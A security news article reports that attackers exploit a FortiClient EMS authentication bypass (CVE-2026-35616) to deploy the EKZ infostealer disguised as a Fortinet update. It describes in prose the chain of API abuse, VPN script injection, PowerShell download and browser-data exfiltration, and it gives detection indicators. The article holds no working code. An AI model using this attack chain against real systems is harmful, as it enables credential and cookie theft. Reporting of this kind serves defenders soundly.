FortiClient EMS flaw exploited by hackers to deploy infostealers

Cybercriminals are actively exploiting an authentication bypass vulnerability tracked as CVE-2026-35616 in FortiClient Enterprise Management Server (EMS) to deploy a previously undocumented credential stealer named EKZ. The attack campaign disguises the malware as a legitimate Fortinet endpoint update and executes it through VPN scripting workflows managed by FortiClient.

The underlying flaw, classified as an improper access control issue, enables unauthenticated remote attackers to execute arbitrary code or commands by sending specially crafted requests. Fortinet acknowledged active exploitation in early April and issued emergency hotfixes for versions 7.4.5 and 7.4.6 of the product.

The Cybersecurity and Infrastructure Security Agency (CISA) responded swiftly by ordering federal agencies to secure their instances by the end of that week. At the time, the internet security watchdog The Shadowserver Foundation reported approximately 2,000 internet-exposed EMS instances.

Earlier this month, cybersecurity firm Arctic Wolf observed attacks leveraging the vulnerability to distribute the EKZ infostealer. Researchers detail that the intrusion begins by abusing endpoint APIs to perform administrative actions without any authentication. The attacker then modifies the EMS configuration and VPN policies, introducing malicious script execution.

Seconds after endpoints establish an IPsec tunnel to a FortiGate firewall, the legitimate fortitray.exe process launches malicious batch scripts through Command Prompt. Those scripts execute a base64-encoded PowerShell payload that downloads and runs malware disguised as a Fortinet patch. The stolen data is then exfiltrated to an attacker-controlled VPS over HTTP.

Rather than relying on generic malware lures, the payload is presented as a Fortinet endpoint update and executed through FortiClient-managed VPN scripting workflows, according to Arctic Wolf’s report. On affected endpoints, FortiClient components launch command scripts that invoke PowerShell, download the credential stealer, execute it silently, and exfiltrate harvested browser data before removing local artifacts.

The EKZ Infostealer features fairly standard information-stealing functionality. It targets both Chromium-based and Firefox web browsers, extracting stored data to text files while bypassing encrypted password protections. The malware targets credentials, credit card details, addresses, phone numbers, and cookies. These cookies can provide access to accounts protected by multi-factor authentication without requiring login credentials.

Arctic Wolf notes that one indication of an exploitation attempt delivering the EKZ infostealer is the presence of the log line “Certificate not found in request header.” In lab tests, this error was followed seconds later by another entry: “Certificate user: fortinet-ca2 … successfully updated.”

The researchers recommend defenders look for certificate-authentication anomalies and unexpected changes to Remote Access Profile configurations. Any suspicious administrative activity, such as new accounts, logins from unfamiliar origins like Tor or VPS IP addresses, or actions leading to configuration changes, should be considered red flags. Arctic Wolf’s report provides extensive detection guidance that could help organizations prevent these observed attacks.